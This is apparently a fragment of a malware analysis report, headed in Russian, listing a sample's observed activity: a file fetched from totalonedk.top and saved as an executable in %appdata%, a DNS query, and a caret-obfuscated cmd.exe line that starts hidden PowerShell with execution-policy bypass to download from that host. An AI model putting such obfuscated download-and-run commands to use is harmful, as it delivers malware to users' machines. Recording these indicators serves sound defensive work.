Техническая информация
- http://totalonedk.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^wERsHE^ll.EXE^ -^EX^EC^uT^I^o^Npol^ICy^ ^bY^pa^ss -^nO^PrOFi^l^E -^wINd^oWstylE^ ^Hi^DdEn^ ^(^NE^W-OBJeCT^ sY^sTem^.NE^T^.w^eBCL^IE^n^t)^.DOWnLoaDFI^LE('http://totalonedk....
- DNS ASK to###onedk.top
- '<SYSTEM32>\cmd.exe' /C "P^o^wERsHE^ll.EXE^ -^EX^EC^uT^I^o^Npol^ICy^ ^bY^pa^ss -^nO^PrOFi^l^E -^wINd^oWstylE^ ^Hi^DdEn^ ^(^NE^W-OBJeCT^ sY^sTem^.NE^T^.w^eBCL^IE^n^t)^.DOWnLoaDFI^LE('http://totalonedk....' (со скрытым окном)